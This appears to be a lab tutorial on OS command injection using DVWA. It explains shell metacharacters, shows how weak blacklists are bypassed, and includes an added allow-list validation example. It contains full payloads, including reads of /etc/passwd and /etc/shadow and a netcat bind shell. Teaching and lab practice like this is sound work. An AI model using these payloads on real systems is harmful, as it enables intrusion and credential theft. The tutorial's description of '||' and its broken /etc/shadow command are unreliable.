Command Injection - Security Tutorials

Command injection is a security vulnerability that allows attackers to execute arbitrary commands on a host operating system through a vulnerable web application. This occurs when user-supplied data is not properly validated, enabling the use of metacharacters to manipulate command execution. The document provides examples of testing for command injection using the Damn Vulnerable Web Application (DVWA) and discusses various metacharacters that can be employed in such attacks.

Command Injection
https://securitytutorials.co.uk/command-injection/

Command injection, also known as OS command injection, is an attack technique used to execute commands on a host operating system via a vulnerable web application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, and so on) to a system shell. These commands are executed with the privileges of the vulnerable application. These attacks are due to the web application not having sufficient input validation on the command being run.

1 of 14 11/17/2022, 11:46 AM
To test for command injection you use metacharacters to string commands together, just like you can from the terminal or command prompt. For example, type this into a Linux terminal:

ping -c 4 127.0.0.1 && ls

Adding && between these commands runs the ls command if the preceding ping command is successful.

There are a whole bunch of other metacharacters you can use; some of the more common ones I have listed below.

Metacharacters

• ; The semicolon is the most common metacharacter used to test an injection flaw. The shell will run all the commands in sequence separated by the semicolon.
• & Separates multiple commands on one command line. It runs the first command then the second command.
• && Runs the command following && only if the preceding command is successful.
• | The pipe pipes the output of the first command into the second command.
• || Redirects the standard output of the first command to the standard input of the second command.
• ` The backtick is used to force the shell to interpret and run commands between backticks. Following is an example of this: variable="OS version `uname -a`" && echo $variable
• () The brackets are used to nest commands.
• # The hash is used as a command line comment.

Command Injection With DVWA

DVWA stands for Damn Vulnerable Web Application. If you don't already have DVWA installed and haven't checked out my tutorial on setting up a vulnerable web server, check that out here.

Log into DVWA and start off by setting the DVWA Security level to Low and clicking Submit.


Now select the Command Injection button and you should be presented with a page that says 'ping a device' and gives you a box to enter an IP address. Enter any IP address and it will ping that address.

If we take a look at the source by clicking the View Source button in the bottom right-hand corner of DVWA, we can see what the application is doing in the background.


Once you have clicked View Source you will be presented with a new window displaying the PHP code above, which the DVWA team have really nicely commented for us.

Basically, the program takes our input in the form of an IP address, then determines what the backend operating system is (Windows or Linux), then runs the appropriate ping command. It then echoes the output of the command back into the web application.

As the web application interacts with the backend operating system and is not sanitizing our input, we can introduce metacharacters to string extra commands on, allowing us to break out of its intended ping command and run our own commands directly on the backend operating system.


Add the metacharacter && after your IP address. This allows you to string a second command onto the first, and it will run as long as the first command is successful. As I know the backend operating system (in this case) is Linux, I try ls -la to list all the directories the web application is running in.

After running the command you can see the ping command run and then the ls command listing all the directories where the web application is running.

Security Level Medium

Switch the security level up to Medium and try the command from security level Low again.

127.0.0.1&&ls -la

Notice the command runs fine with just the IP address, but as soon as you add the metacharacter ( && ) and your injected command it does not output anything and reloads the page.

If you take a look at the source you can see the programmer has modified the code from security level Low, adding a blacklist blocking two metacharacters from being added to the input: && and ;.

Lucky for us there are plenty of other metacharacters to try.

Changing the metacharacter to a single & or any other that is not on the blacklist still allows us to inject our command.

Security Level High

Now increase the security level of DVWA to High, then notice that the same command from security level Medium above no longer works.


Now let's open up the source code and take a look at what changes have been made.

It looks like the programmer has extended the metacharacters which are blacklisted in the web application.

But all is not lost. Notice the highlighted area in the blacklist above: there is an error in the syntax, as the programmer has added an extra space after the | (pipe) metacharacter and the backtick. This means we should still be able to use command injection as long as we don't put any spaces in our command and use the pipe like this.


This shows that even though the programmer has made a thorough blacklist, one little extra space still lets us inject our commands into the web application.

Security Level Impossible

On security level Impossible this is how it should be done. If we first take a look at the source we can see what changes have been made to the program.

As you can see from the commented code above, the programmer has got rid of the blacklist altogether and is now instead validating the user's input: anything other than an IP address gives the error message "You have entered an invalid IP".
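Added example, not code from the tutorial or from DVWA's own PHP: a Python analogue of the Medium-level blacklist beside the Impossible-level allow-list validation, with ping invoked as an argv list rather than through a shell. The function names, the helper layout and the Windows/Linux count flag handling are my assumptions; the error message is the one quoted above.

```python
import ipaddress
import platform
import subprocess
from typing import Optional

# Error message quoted in the tutorial's Impossible level.
INVALID_MSG = "You have entered an invalid IP"

def medium_filter(user_input: str) -> str:
    """Blacklist in the spirit of the Medium level: strip '&&' and ';'.
    A single '&', a '|' or a backtick passes straight through, which is
    why stripping known-bad tokens is not a fix."""
    for token in ("&&", ";"):
        user_input = user_input.replace(token, "")
    return user_input

def validate_ip(user_input: str) -> Optional[str]:
    """Allow-list check like the Impossible level: accept only a valid
    IPv4/IPv6 literal and return it normalised, else None. ipaddress
    rejects metacharacters, spaces and anything else that is not an
    address, so there is no list of bad characters to keep up to date."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None

def build_ping_argv(ip: str, os_name: Optional[str] = None) -> list:
    """Build the ping command as an argv list (assumed helper). The count
    flag is -n on Windows and -c elsewhere (the tutorial's 'ping -c 4'
    form). An argv list handed to subprocess without shell=True is never
    parsed by a shell, so metacharacters could not act as syntax even if
    the validation step were missing."""
    os_name = os_name or platform.system()
    count_flag = "-n" if os_name == "Windows" else "-c"
    return ["ping", count_flag, "4", ip]

def ping_host(user_input: str) -> str:
    """Validate first, then run ping without a shell. Returns the
    tutorial's error message on bad input, otherwise ping's output."""
    ip = validate_ip(user_input)
    if ip is None:
        return INVALID_MSG
    result = subprocess.run(build_ping_argv(ip), capture_output=True,
                            text=True, timeout=15)
    return result.stdout + result.stderr
```

The blacklist removes the two tokens the Medium level blocks and nothing else, while the allow-list returns None for every input on this page that is not a bare IP address, which is the check that actually closes the hole.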

Things to Try Yourself

If you have also installed Mutillidae and bWAPP from my setting up a vulnerable LAMP server tutorial, have a go at the command injection section of these.

Remember any command you can run in the terminal you can run after a command injection; you don't have to just use ls as I have in my examples, try some of these.

127.0.0.1|whoami shows you the user the web application is currently running as.

127.0.0.1|uname -a shows the operating system version the web server is running.

127.0.0.1&&ifconfig shows you all the network configuration information.

127.0.0.1&&php -v gives you the PHP version running on the web application's server.

127.0.0.1&&cat /etc/passwd displays all the users on the backend Linux server.

127.0.0.1&&/etc/shadow displays all hashed passwords, but only if you are running with root privileges.

NetCat Remote Shell

If NetCat (nc) is installed on your vulnerable web server and it has the -e option, you should be able to create a remote shell like so.

127.0.0.1&&nc -lp 31337 -e /bin/bash

Then from your PC connect to this listener using the web server's IP address.
